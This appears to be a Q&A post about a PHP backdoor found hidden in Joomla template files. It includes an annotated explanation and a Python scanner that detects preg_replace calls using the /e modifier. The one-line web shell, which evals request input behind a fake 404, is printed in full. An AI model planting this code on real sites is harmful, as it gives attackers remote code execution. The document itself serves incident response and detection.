What does this code mean, and how can it be used by malicious hackers?



I have just found, on a Joomla site I administer, many templateDetails.php files hidden in various folders, containing the following code:

<?php if (!isset($_REQUEST['e44e'])) header("HTTP/1.0 404 Not Found"); @preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>

I promptly restored the site from a backup, changed all the administrator passwords, and hardened the site's security.

Can you explain how this kind of code is used to steal from or compromise a website?

I have annotated the code below to explain it:

<?php
// Check for a POST or GET (query string) variable called e44e
if (!isset($_REQUEST['e44e']))
    header("HTTP/1.0 404 Not Found"); // If that variable doesn't exist, send a 404
// This is quite clever - the 'e' flag in preg forces PHP to eval the string, and
// then in theory use the result as the preg_replace replacement (however in this
// case that bit doesn't matter, as all it is actually looking to do is execute
// whatever has been passed through the request - basically doing eval(), but
// hiding it so it's not as obvious, and won't (in theory) get picked up by any
// installs that block eval (although in practice most then also stop the e flag
// from working as well)
@preg_replace('/(.*)/e', @$_REQUEST['e44e'], '');
?>

In short, it is a fancy way of using eval() that lets them pass any code as a query string and then execute it!
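A small scanner for exactly this pattern, added here as an example (not code from the question or the answer): it walks PHP source looking for preg_replace() calls whose pattern literal carries the /e modifier and flags whether the replacement argument is fed from a request superglobal, as in the backdoor above. The file contents are constructed samples, not files from the site in question.

```python
import re

# Constructed sample files: the backdoor from the question, a benign replace
# without /e, and a legacy /e call that does not take user input.
SAMPLES = {
    "templates/foo/templateDetails.php":
        "<?php if (!isset($_REQUEST['e44e'])) header(\"HTTP/1.0 404 Not Found\"); "
        "@preg_replace('/(.*)/e', @$_REQUEST['e44e'], ''); ?>",
    "templates/foo/index.php":
        "<?php echo preg_replace('/\\s+/', ' ', $text); ?>",
    "plugins/bar/bar.php":
        "<?php $x = preg_replace('/a/e', 'strtoupper(\"$1\")', $s); ?>",
}

# preg_replace( followed by a single- or double-quoted pattern literal
PREG_CALL = re.compile(r"preg_replace\s*\(\s*(['\"])(.+?)\1", re.DOTALL)
# request-derived superglobals that would make the /e call remotely triggerable
SUPERGLOBAL = re.compile(r"\$_(REQUEST|GET|POST|COOKIE)\b")


def find_e_modifier_calls(source):
    """Return [(pattern_literal, uses_request_input)] for each /e preg_replace."""
    hits = []
    for m in PREG_CALL.finditer(source):
        pattern = m.group(2)
        delim = pattern[0]                 # PCRE delimiter, e.g. '/'
        end = pattern.rfind(delim)         # modifiers follow the closing delimiter
        if end <= 0 or "e" not in pattern[end + 1:]:
            continue
        stop = source.find(";", m.end())   # rough extent of the call's arguments
        call = source[m.start():stop if stop != -1 else len(source)]
        hits.append((pattern, bool(SUPERGLOBAL.search(call))))
    return hits


def scan_files(files):
    """Map path -> hits for every file that contains at least one /e call."""
    report = {}
    for path, source in files.items():
        hits = find_e_modifier_calls(source)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLES).items():
        for pattern, remote in hits:
            print(f"{path}: /e pattern {pattern!r}, request-controlled={remote}")
```

Any hit with request-controlled input is effectively a remote eval() and should be treated as a compromise; the /e modifier was removed in PHP 7.0, so hits without user input are usually just legacy code that will break on upgrade.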
